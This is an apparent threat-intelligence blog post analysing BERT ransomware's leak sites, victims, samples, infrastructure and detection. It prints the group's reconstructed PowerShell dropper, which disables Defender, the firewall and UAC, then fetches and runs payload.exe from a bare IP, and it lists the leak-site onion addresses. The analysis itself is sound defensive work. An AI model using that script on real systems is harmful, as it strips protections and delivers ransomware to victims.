BERT RANSOMWARE

NOTE: This is an initial investigation report on BERT ransomware, written because I have spotted multiple infections within a short time-span.

BERT ransomware was first publicly spotted in April 2025, but analysis of a few of the samples shows that the group has been active since mid-March 2025.

It is believed that they target their victims via phishing.

Skeleton representing BERT (Credit: Imgproxy)

The group initially targeted Windows environments in March 2025; by May 2025 it had upgraded its tooling to attack Linux machines as well.

They can be reached on the Dark Web at:-

bertblogsoqmm4ow7nqyh5ik7etsmefdbf25stauecytvwy7tkgizhad.onion

Data Leak Site of BERT Ransomware

The group stores their victim leaks on another server; which can be reached at:-

wtwdv3ss4d637dka7iafl7737ucykei7pluzc7is3mgo2vl5nmq7eeid.onion

Leaks are published in parts, as zipped archives named “part1”, “part2”, “part3” and so on.

Victim Page

Every victim page lists the victim's legitimate URL together with its revenue and the publication date of the leak.

The site also offers a “Contact us” page so that visitors can get in touch with the group directly.

Contact Us Page

It is notable that both servers (the data leak site and the file storage server) identify themselves as Apache/2.4.52 (Ubuntu).

NEGOTIATION

Unlike other ransomware groups, this group does not (so far) operate a dedicated onion site for negotiations. Instead, communication takes place over the privacy-focused Session messenger.

The group demands its ransom in BTC. Below is a chat opened with a victim from whom 1.5 BTC was demanded.

Negotiation

VICTIMOLOGY

As with other ransomware groups, the US tops the list, with two victims. Other affected geographies are the UK, Malaysia, Taiwan, Colombia, and Turkey.

By sector, the most affected are services and manufacturing. Other affected sectors are logistics, IT, and healthcare.

SAMPLE ANALYSIS

This is not a complete analysis report; the samples are shared so that other researchers can go and analyze them.

I managed to collect 8 samples of BERT and uploaded them to the community portal for better reversing by other passionate security nerds.

Sample Upload

There were 6 EXE files (Windows) and 2 ELF files (Linux).

Among these, only one file had a plausible compile timestamp, 20th May 2025 (MD5: 00fdc504be1788231aa7b7d2d1335893). The rest carry timestamps in future years such as 2047, 2076, 2071 and 2063. A future-dated PE timestamp can be deliberate manipulation, but it is also exactly what deterministic (reproducible) .NET builds produce, since the compiler then stores a content hash in that field instead of a time; on its own the field therefore proves neither a build date nor tampering.

From this, the one trustworthy timestamp dates that build to mid-May 2025. It fixes the build date of a single sample, not the start of the group's activity, which the observations above place in mid-March 2025.

Most of the files (5) carry the filename “newcryptor.exe”, which is unique to this ransomware. “Bert” and “Bert11” are the other two filenames found in the sample collection. Other observed filenames are: worker.exe, payload.exe, build.exe, build.exe.bin and ESXDSC04_bert11.
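As an added example, not code from the report or from the group's tooling, the following Python reads the COFF TimeDateStamp straight out of a PE header and classifies it, so the timestamp check above can be repeated on any PE rather than on these eight files only. The analysis date, the 2002 lower bound and the constructed header bytes are assumptions for the demonstration; a real triage would read the sample files instead.

```python
import struct
from datetime import datetime, timezone

# Assumed cut-off for this example: nothing in the set can predate .NET itself.
EARLIEST_PLAUSIBLE = datetime(2002, 1, 1, tzinfo=timezone.utc)


def pe_timestamp(data: bytes) -> datetime:
    """Return the COFF TimeDateStamp of a PE image as a UTC datetime.

    IMAGE_DOS_HEADER.e_lfanew (DWORD at 0x3C) points to the "PE\\0\\0"
    signature; the COFF file header follows it, and TimeDateStamp is the
    DWORD at offset 4 within that header (after Machine, NumberOfSections).
    """
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    (stamp,) = struct.unpack_from("<I", data, e_lfanew + 4 + 4)
    return datetime.fromtimestamp(stamp, tz=timezone.utc)


def classify_timestamp(data: bytes, analysis_time: datetime) -> str:
    """'future' and 'too-old' stamps cannot be real build times.

    A future stamp is either deliberate anti-forensics or the content hash
    that deterministic .NET builds store in this field, so by itself it
    proves manipulation no more than it proves a build date.
    """
    ts = pe_timestamp(data)
    if ts > analysis_time:
        return "future"
    if ts < EARLIEST_PLAUSIBLE:
        return "too-old"
    return "plausible"


def build_minimal_pe(stamp: int) -> bytes:
    """Constructed input: only the headers pe_timestamp() needs, not a runnable PE."""
    e_lfanew = 0x40
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x014C, 1, stamp, 0, 0, 0, 0x0102)
    return bytes(dos) + b"PE\0\0" + coff


def demo() -> dict:
    """Classify two constructed headers against an assumed analysis date."""
    analysis_time = datetime(2025, 6, 1, tzinfo=timezone.utc)
    samples = {
        # 2025-05-20 00:00 UTC, like the one trustworthy stamp in the set
        "legit-2025-05-20": build_minimal_pe(1747699200),
        # a year-2071 stamp of the kind seen in the other samples
        "future-2071": build_minimal_pe(
            int(datetime(2071, 1, 1, tzinfo=timezone.utc).timestamp())),
    }
    return {name: (pe_timestamp(blob).year, classify_timestamp(blob, analysis_time))
            for name, blob in samples.items()}


if __name__ == "__main__":
    for name, (year, verdict) in demo().items():
        print(f"{name}: year={year} verdict={verdict}")
```

The classification is deliberately coarse: a "future" verdict is a reason to discard the field, not evidence of intent, and the real build date then has to come from elsewhere (first-seen dates, the PDB path, or the #US heap contents of the .NET image).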

WINDOWS VARIANT

Upon analyzing the samples, I found that they append a series of extensions such as:

  • encryptedbybert
  • encryptedbybert3
  • encryptedbybert11
  • encrypted_bert
  • hellofrombert

Using several different extensions across builds is an unusual approach, rarely seen in other ransomware families.

The files are encrypted using RSA through the Windows crypto API. (RSA is far too slow for bulk data, so in practice it is normally used to wrap a per-file or per-victim symmetric key; the key handling is not covered in this initial report.)

The observed sample is compiled with .NET, and the ransom note is named “note.txt”, unlike the “read-me” style names used by other groups.

Here is the Ransom Note of the group:-

Ransom Note of Bert Group

Unlike other groups', their ransom note is short.

The PDB path embedded in the binaries is the same across all observed samples: D:\new folder\Tiger\newcryptor\obj\Release\newcryptor.pdb. Such a path is a useful pivot for hunting further builds from the same developer.
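As an added example, not code from the report, the following Python checks a file image for the indicators listed in this section. The constructed blob stands in for a .NET PE: it places the PDB path as a narrow string, as the RSDS debug record does, and the extension and note literals as UTF-16LE, as the .NET #US string heap does. That difference is the practical point: an ASCII-only strings run on such a sample reports the PDB path but none of the extensions, so both encodings are searched.

```python
import re
from typing import Dict, List

# Indicators taken from the observations in this section.
PDB_PATH = r"D:\new folder\Tiger\newcryptor\obj\Release\newcryptor.pdb"
EXTENSIONS = ["encryptedbybert", "encryptedbybert3", "encryptedbybert11",
              "encrypted_bert", "hellofrombert"]
NOTE_NAME = "note.txt"
INDICATORS = [("pdb_path", PDB_PATH), ("ransom_note", NOTE_NAME)] + \
             [("extension:" + ext, ext) for ext in EXTENSIONS]


def _pattern(text: str, encoding: str) -> re.Pattern:
    """Compile a byte regex for `text` in the given encoding.

    A negative lookahead rejects matches followed by another identifier
    character, so "encryptedbybert" does not fire on "encryptedbybert11".
    In UTF-16LE every ASCII character is followed by a NUL byte.
    """
    body = re.escape(text.encode(encoding))
    if encoding == "utf-16-le":
        tail = rb"(?![0-9A-Za-z_]\x00)"
    else:
        tail = rb"(?![0-9A-Za-z_])"
    return re.compile(body + tail)


def find_indicators(data: bytes) -> Dict[str, List[str]]:
    """Map each indicator present in `data` to the encodings it was found in."""
    hits: Dict[str, List[str]] = {}
    for label, text in INDICATORS:
        found = [enc for enc in ("utf-8", "utf-16-le")
                 if _pattern(text, enc).search(data)]
        if found:
            hits[label] = found
    return hits


def build_sample_blob() -> bytes:
    """Constructed stand-in for a .NET PE (not a real sample).

    RSDS record: signature, 16-byte GUID, 4-byte age, NUL-terminated narrow path.
    #US heap: .NET string literals stored as UTF-16LE.
    """
    rsds = b"RSDS" + bytes(16) + bytes(4) + PDB_PATH.encode("utf-8") + b"\0"
    literals = ["note.txt", ".encryptedbybert11", "hellofrombert"]
    us_heap = b"".join(s.encode("utf-16-le") + b"\0\0" for s in literals)
    return bytes(64) + rsds + bytes(32) + us_heap + bytes(64)


if __name__ == "__main__":
    for label, encodings in sorted(find_indicators(build_sample_blob()).items()):
        print(f"{label}: {', '.join(encodings)}")
```

On a real sample the same search can be run over the whole file; for a .NET assembly the literals will come back as utf-16-le hits and the PDB path as a utf-8 hit, which is also the reason `strings` needs its wide-character mode (`-el`) to see the former.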

LINUX VARIANT

Scanning the file shows that the Linux variant has an 80% code-base match with Sodinokibi ransomware, also known as REvil.

Code-Base match with Revil Ransomware

An awk command is invoked; the scan labels this a registry query, but Linux has no registry, so it should be read as parsing of command output. The scan attributes file encryption to AES and the RC4 PRGA, and additionally reports Salsa20 and ChaCha, with data also being Base64-encoded. Two caveats apply to this kind of constant-based identification: Salsa20 and ChaCha initialise their state from the same 16-byte constant, so a constant match cannot tell them apart (REvil's Linux builds are known to use Salsa20), and RC4 has no fixed constants at all, so an "RC4 PRGA" report comes from a code pattern rather than from data.
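As an added example that is not part of the report, the Python below shows how such a constant scan works and makes the Salsa20/ChaCha ambiguity explicit: it searches a byte image for the constants behind the algorithms named above, falls back to the four split sigma words that compilers often emit as separate immediates, and leaves RC4 out because there is nothing in data to match. The byte blobs are constructed for the demonstration and are not taken from the sample.

```python
import re
from typing import Dict, List

# label -> (constant bytes, algorithm family it points to)
CONSTANTS = {
    # Salsa20 and ChaCha both expand their key with these words ("sigma" for
    # 256-bit keys, "tau" for 128-bit keys); a hit cannot tell them apart.
    "sigma": (b"expand 32-byte k", "Salsa20/ChaCha"),
    "tau":   (b"expand 16-byte k", "Salsa20/ChaCha"),
    # First 16 entries of the AES forward and inverse S-boxes.
    "aes_sbox":     (bytes.fromhex("637c777bf26b6fc53001672bfed7ab76"), "AES"),
    "aes_inv_sbox": (bytes.fromhex("52096ad53036a538bf40a39e81f3d7fb"), "AES"),
    # Standard Base64 alphabet, normally present as one contiguous table.
    "base64_alphabet": (b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                        b"abcdefghijklmnopqrstuvwxyz0123456789+/", "Base64"),
}

# Compilers often emit sigma as four 32-bit immediates (0x61707865, 0x3320646e,
# 0x79622d32, 0x6b206574) rather than one string; the little-endian bytes of
# those immediates are exactly the four 4-byte slices of the string.
SIGMA_WORDS = [b"expand 32-byte k"[i:i + 4] for i in range(0, 16, 4)]


def scan_crypto_constants(data: bytes) -> Dict[str, List[int]]:
    """Return {label: [offsets]} for every constant that occurs in `data`."""
    found: Dict[str, List[int]] = {}
    for label, (const, _) in CONSTANTS.items():
        offsets = [m.start() for m in re.finditer(re.escape(const), data)]
        if offsets:
            found[label] = offsets
    if "sigma" not in found:
        word_offsets = [data.find(w) for w in SIGMA_WORDS]
        if all(off >= 0 for off in word_offsets):
            found["sigma_words_split"] = word_offsets
    return found


def identify_algorithms(data: bytes) -> List[str]:
    """Summarise the families suggested by the constants found.

    RC4 is deliberately absent: its KSA/PRGA use no fixed constants and can
    only be recognised from code (the 256-entry swap loop), not from data.
    """
    families = set()
    for label in scan_crypto_constants(data):
        if label == "sigma_words_split":
            families.add("Salsa20/ChaCha (weak: split words)")
        else:
            families.add(CONSTANTS[label][1])
    return sorted(families)


def build_sample_blobs() -> Dict[str, bytes]:
    """Constructed images for the demonstration, not real samples."""
    sigma = b"expand 32-byte k"
    # x86 'mov dword [ebp-N], imm32' style: each sigma word sits behind an opcode,
    # so the contiguous string is absent but all four words are present.
    split = b"".join(b"\xc7\x45" + bytes([0xF0 + 4 * i]) + sigma[4 * i:4 * i + 4]
                     for i in range(4))
    return {
        "contiguous_constants": (bytes(32) + sigma + bytes(16) + CONSTANTS["aes_sbox"][0]
                                 + bytes(8) + CONSTANTS["base64_alphabet"][0] + bytes(32)),
        "split_sigma_only": bytes(16) + split + bytes(16),
        "nothing": bytes(128),
    }


if __name__ == "__main__":
    for name, blob in build_sample_blobs().items():
        print(f"{name}: {identify_algorithms(blob)}")
```

The scanner reports families, not ciphers: deciding between Salsa20 and ChaCha needs a look at the quarter-round (Salsa20 rotates by 7, 9, 13, 18 over a column/row pattern; ChaCha by 16, 12, 8, 7), and that is code analysis, not constant matching.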

WEAPONIZING POWERSHELL SCRIPT

During the investigation, I came across a PowerShell script, hosted on a remote server, that is tied to the execution of the BERT sample.

The observed path was:-

http://185.100.157.74/start.ps1

Before fetching the encryption payload (discussed below), this script weakens the system by disabling or downgrading its security controls and privilege protections.

This is the PowerShell script obtained:-

# Reconstructed from the fragments as published; message strings that did not
# survive extraction are shown as "...". Behaviour is as described in the breakdown below.

# 1. Relaunch elevated if not already running as Administrator (this is a UAC prompt, not a bypass)
if (-not ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
    Start-Process PowerShell -ArgumentList "-NoProfile -ExecutionPolicy Bypass -File `"$PSCommandPath`"" -Verb RunAs
    exit
}

# 2. Windows Defender: create the policy keys if missing, then set the disable flags
Write-Host "[*] ... Windows Defender..."
$defenderPaths = @(
    "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender",
    "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection",
    "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Cloud Based Protection"
)
foreach ($path in $defenderPaths) {
    if (-not (Test-Path $path)) { New-Item -Path $path -Force | Out-Null }
}
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 1 -Type DWord -Force
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableRealtimeMonitoring" -Value 1 -Type DWord -Force
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Cloud Based Protection" -Name "DisableCloudProtection" -Value 1 -Type DWord -Force

# Stop the Defender services (silently ignored if absent or protected)
Get-Service -Name "WinDefend", "Sense" -ErrorAction SilentlyContinue | Stop-Service -Force

# 3. Windows Firewall, all profiles
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False -ErrorAction SilentlyContinue

# 4. UAC (EnableLUA only takes effect after the next reboot)
Write-Host "[*] ... UAC..."
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "EnableLUA" -Value 0 -Type DWord -Force

# 5. Download payload.exe into %TEMP% and run it elevated
$downloadUrl = "http://185.100.157.74/payload.exe"
$destPath = "$env:TEMP\payload.exe"
Write-Host "[*] ... $downloadUrl..."
try {
    Invoke-WebRequest -Uri $downloadUrl -OutFile $destPath -ErrorAction Stop
} catch {
    Write-Error "[...]"
}
if (-not (Test-Path $destPath)) {
    # body not recovered from the page; the script only continues when the file exists
    exit
}
Write-Host "[*] ... payload.exe..."
Start-Process -FilePath $destPath -Verb RunAs -Wait
Write-Host "[+] ..."

Here’s a breakdown of its functionality:

Key Actions in the Script

  1. Privilege escalation check:

It first checks whether it is running with administrative privileges via Security.Principal.WindowsPrincipal. If not, it re-launches itself with -Verb RunAs, which raises a UAC prompt rather than bypassing it; everything that follows depends on that prompt being accepted.

  2. Windows Defender disabling:

  • The script sets the policy registry values that disable Defender's AntiSpyware, Real-Time Protection and Cloud-Based Protection.
  • It also attempts to stop the security-related services (WinDefend, Sense) and disables the Windows Firewall on all three profiles. On hosts where Defender Tamper Protection is enabled these changes are rejected, and the script never checks whether they took effect.

  3. User Account Control (UAC) modification:

The script sets EnableLUA to 0, which disables UAC from the next reboot onwards, lowering security protections and allowing later malicious operations to proceed unchecked.

  4. Downloading and executing a payload:

  • It fetches an executable (payload.exe) from a bare external IP (185.100.157.74), which is highly indicative of malware delivery.
  • It saves the file to the user's temp directory and then runs it with administrative privileges.

In a nutshell:-

  • Registry Modifications disabling security features
  • Disabling Defender, Firewall & UAC to bypass security controls
  • External Payload Download from an unknown IP
  • Execution of malicious binaries

This aligns with common ransomware behavior, where the malware weakens security defenses before executing its encryption payload. 
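As an added example that is not part of the report, the following Python turns the breakdown above into detection logic and runs it over constructed telemetry in the shape a Sysmon plus PowerShell-logging pipeline emits as JSON: Sysmon Event ID 1 (process creation) and 13 (registry value set), and PowerShell Event ID 4104 (script block logging). The host names, paths and event records are constructed for the demonstration; the registry values, service names and cmdlets are the ones the script uses, and the ATT&CK technique IDs are the standard ones for each behaviour.

```python
import re
from typing import Dict, List, Tuple

DEFENDER_POLICY = r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender"
DEFENDER_KILL_VALUES = {"DisableAntiSpyware", "DisableRealtimeMonitoring", "DisableCloudProtection"}
UAC_VALUE = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA"

Alert = Tuple[str, str, str]   # (ATT&CK technique, rule name, evidence)


def _dword(details: str):
    """Sysmon renders DWORD values as 'DWORD (0x00000001)'; return the int or None."""
    m = re.fullmatch(r"DWORD \(0x([0-9A-Fa-f]{8})\)", details or "")
    return int(m.group(1), 16) if m else None


def evaluate(event: Dict) -> List[Alert]:
    """Apply the defence-tampering rules to one event."""
    alerts: List[Alert] = []
    source, eid = event.get("Source"), event.get("EventID")

    if source == "Sysmon" and eid == 13:                      # registry value set
        target = event.get("TargetObject", "")
        key, _, value_name = target.rpartition("\\")
        data = _dword(event.get("Details"))
        # Only the *disabling* direction fires; an admin setting 0 is not tampering.
        if key.startswith(DEFENDER_POLICY) and value_name in DEFENDER_KILL_VALUES and data == 1:
            alerts.append(("T1562.001", "defender_policy_disable", target))
        if target == UAC_VALUE and data == 0:
            alerts.append(("T1548.002", "uac_disabled", target))

    elif source == "Sysmon" and eid == 1:                     # process creation
        cmd = event.get("CommandLine", "")
        low = cmd.lower()
        if ("powershell" in event.get("Image", "").lower()
                and "-executionpolicy bypass" in low and "-file" in low):
            alerts.append(("T1059.001", "powershell_bypass_script", cmd))

    elif source == "PowerShell" and eid == 4104:              # script block text
        text = event.get("ScriptBlockText", "")
        low = text.lower()
        if "set-netfirewallprofile" in low and "-enabled false" in low:
            alerts.append(("T1562.004", "firewall_profiles_disabled", text))
        if "stop-service" in low and ("windefend" in low or '"sense"' in low):
            alerts.append(("T1562.001", "defender_service_stop", text))
        if ("invoke-webrequest" in low and "-outfile" in low
                and re.search(r"https?://\d{1,3}(\.\d{1,3}){3}/", low)):
            alerts.append(("T1105", "download_from_bare_ip", text))
    return alerts


def run(events: List[Dict]) -> List[Alert]:
    return [alert for event in events for alert in evaluate(event)]


# Constructed telemetry mirroring the script's actions on host WS01, plus benign noise from WS02.
SAMPLE_EVENTS: List[Dict] = [
    {"Source": "Sysmon", "EventID": 1, "Host": "WS01",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -NoProfile -ExecutionPolicy Bypass -File "C:\Users\victim\Downloads\start.ps1"'},
    {"Source": "Sysmon", "EventID": 13, "Host": "WS01",
     "TargetObject": DEFENDER_POLICY + r"\Real-Time Protection\DisableRealtimeMonitoring",
     "Details": "DWORD (0x00000001)"},
    {"Source": "PowerShell", "EventID": 4104, "Host": "WS01",
     "ScriptBlockText": 'Get-Service -Name "WinDefend", "Sense" -ErrorAction SilentlyContinue | Stop-Service -Force'},
    {"Source": "PowerShell", "EventID": 4104, "Host": "WS01",
     "ScriptBlockText": "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False -ErrorAction SilentlyContinue"},
    {"Source": "Sysmon", "EventID": 13, "Host": "WS01",
     "TargetObject": UAC_VALUE, "Details": "DWORD (0x00000000)"},
    {"Source": "PowerShell", "EventID": 4104, "Host": "WS01",
     "ScriptBlockText": r"Invoke-WebRequest -Uri http://185.100.157.74/payload.exe -OutFile C:\Users\victim\AppData\Local\Temp\payload.exe -ErrorAction Stop"},
    # Benign: an administrator re-enabling real-time protection, and an ordinary process.
    {"Source": "Sysmon", "EventID": 13, "Host": "WS02",
     "TargetObject": DEFENDER_POLICY + r"\Real-Time Protection\DisableRealtimeMonitoring",
     "Details": "DWORD (0x00000000)"},
    {"Source": "Sysmon", "EventID": 1, "Host": "WS02",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe notes.txt"},
]


if __name__ == "__main__":
    for technique, rule, evidence in run(SAMPLE_EVENTS):
        print(f"{technique:10} {rule:28} {evidence}")
```

Two design points matter here. The registry rules key on the value written, so a defender restoring the setting does not trip them, and the cmdlet rules read script block text rather than process command lines, because everything after the initial launch runs inside one powershell.exe process and never appears as a separate Event ID 1.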

FINDING PAYLOAD

Analyzing the network communication of the PowerShell script discussed above reveals the payload that BERT downloads onto the infected system:-

http://185.100.157.74/payload.exe/

Payload Relation

It is notable that both files (the PowerShell script and the payload) are hosted on the same server, which geolocates to Sweden 🇸🇪.

Tracing the IP's real registrant shows that it is under the control of a Russian firm:-

IP Ownership

UNITEDNET's legal name is Edinaya Set Limited, a well-known provider in Russia 🇷🇺.

Edinaya ASN Profile

Unsurprisingly, the threat actors again chose Russian-owned infrastructure to blend their traffic in.

MITRE ATT&CK FRAMEWORK

Here is the MITRE ATT&CK matrix for the Windows executable:-

MITRE Matrix

Here is the MITRE ATT&CK matrix for the Linux executable:-

MITRE Matrix

TOR DLS EXPOSURE

A fingerprint scan found that the group had hosted their Tor DLS (data leak site) on a Russian server:

82.115.223.89:3030

NOTE: Although the IP currently geolocates to the Netherlands, it was part of a Russian network.

The same response shows that the group built the DLS on Next.js, a React framework.

The hosting ASN is AS202973, which has previously been seen hosting Mystic Stealer.
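One way such a fingerprint match between an onion service and a clearnet IP:port is made, as an added example that is not part of the report: parse the raw HTTP responses from both, extract the artefacts that stay stable across requests (server headers, page title and, for a Next.js site, the build ID embedded in its /_next/static/ asset paths, which is unique to one deployment), and compare them. The responses below are constructed for the demonstration and do not reproduce the real site's content or headers.

```python
import hashlib
import re
from typing import Dict

STABLE_HEADERS = ("server", "x-powered-by", "etag", "last-modified")
# Artefacts unique to one deployment rather than to a framework or a distro.
STRONG_KEYS = {"next_build_id", "etag", "body_sha256"}


def parse_http_response(raw: bytes) -> Dict:
    """Split a raw HTTP/1.1 response into status line, lowercase headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"status": lines[0], "headers": headers, "body": body}


def fingerprint(raw: bytes) -> Dict[str, str]:
    """Extract the artefacts worth comparing between two hosts."""
    resp = parse_http_response(raw)
    body = resp["body"].decode("utf-8", "replace")
    fp: Dict[str, str] = {h: resp["headers"][h] for h in STABLE_HEADERS if h in resp["headers"]}
    m = re.search(r"<title>(.*?)</title>", body, re.I | re.S)
    if m:
        fp["title"] = m.group(1).strip()
    # Next.js serves its client bundles under /_next/static/<buildId>/...
    m = re.search(r"/_next/static/([A-Za-z0-9_-]+)/_buildManifest\.js", body)
    if m:
        fp["next_build_id"] = m.group(1)
    fp["body_sha256"] = hashlib.sha256(resp["body"]).hexdigest()
    return fp


def correlate(fp_a: Dict[str, str], fp_b: Dict[str, str]) -> Dict:
    """Report which artefacts agree and whether any deployment-unique one does."""
    matched = sorted(k for k in fp_a if k in fp_b and fp_a[k] == fp_b[k])
    return {"matched": matched, "strong_match": any(k in STRONG_KEYS for k in matched)}


def _response(extra_headers: str, build_id: str, title: str) -> bytes:
    """Build a constructed response; the markup is a stand-in, not the real DLS."""
    body = (f"<html><head><title>{title}</title></head><body>"
            f'<script src="/_next/static/{build_id}/_buildManifest.js"></script>'
            f"</body></html>").encode()
    head = "HTTP/1.1 200 OK\r\n" + extra_headers + f"Content-Length: {len(body)}\r\n\r\n"
    return head.encode() + body


# Constructed: the onion service, a clearnet host serving the same deployment
# (only the Date header differs), and an unrelated Next.js site.
SAMPLES = {
    "onion": _response("X-Powered-By: Next.js\r\nDate: Tue, 03 Jun 2025 10:00:00 GMT\r\n", "k9xQ2abc", "Leaks"),
    "clearnet": _response("X-Powered-By: Next.js\r\nDate: Tue, 03 Jun 2025 10:05:31 GMT\r\n", "k9xQ2abc", "Leaks"),
    "unrelated": _response("X-Powered-By: Next.js\r\n", "Zz7other1", "Corporate Portal"),
}


if __name__ == "__main__":
    fps = {name: fingerprint(raw) for name, raw in SAMPLES.items()}
    print("onion vs clearnet:", correlate(fps["onion"], fps["clearnet"]))
    print("onion vs unrelated:", correlate(fps["onion"], fps["unrelated"]))
```

The split between weak and strong keys is the point: a matching X-Powered-By or Server string only says two hosts run the same stack, while a matching Next.js build ID or ETag ties them to the same deployed build and is what justifies calling the clearnet address an exposure of the onion service.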

CONCLUSION

From the collected samples, it appears that the group made the effort to write its own Windows ransomware, whereas for the Linux build it relied on the old REvil code base as a spin-off.

IOCs

For IOCs of BERT, you may visit my GitHub profile here!

NOTE: This article is purely individual research belonging to THE RAVEN FILE and may not be used or published anywhere without the author's consent.

Follow me on X/Twitter for interesting DarkWeb/InfoSec Short findings! 😉

Responses to “BERT RANSOMWARE”

  1. […] to The Raven File Report, the group’s operational sophistication extends to its initial attack vector, utilizing a […]

  2. […] THE RAVEN FILE: BERT RANSOMWARE […]

  3. […] the Linux version shows a highly mature malicious design. According to THE RAVEN FILE's analysis, its code overlaps with REvil (Sodinokibi) ransomware by as much as […]

  4. John

    Dear Rakesh,

    Thank you for sharing such a great research on BERT Ransomware Group. I have one question, related to an Indicator being shared on GitHub associated with BERT.

    ‘169.254.169.254’

    Just want to understand, why this indicator has been included in the list, as this is a Link-Local address.

    1. Thank you for enjoying the article! Though it's a link-local address, I do not want to miss a trivial piece of info. This could help in an upcoming investigation in some way.

      1. mattelk

        The addition of 169.254.169.254 to the IoC list for this can fundamentally break Azure operations, as this link-local address is used for the Azure backplane fabric with requests like “http://169.254.169.254/metadata/instance?api-version=2021-02-01”, which control API access for things like HA clusters.

      2. You may add it to the grey list, without actively blocking it.

  5. […] Bert ransomware […]

  6. […] BERT Ransomware Targets Multi-OS: Uses phishing, PowerShell scripts, and leaks data on dark web; controlled from Russian infrastructure. BERT Ransomware Campaign […]
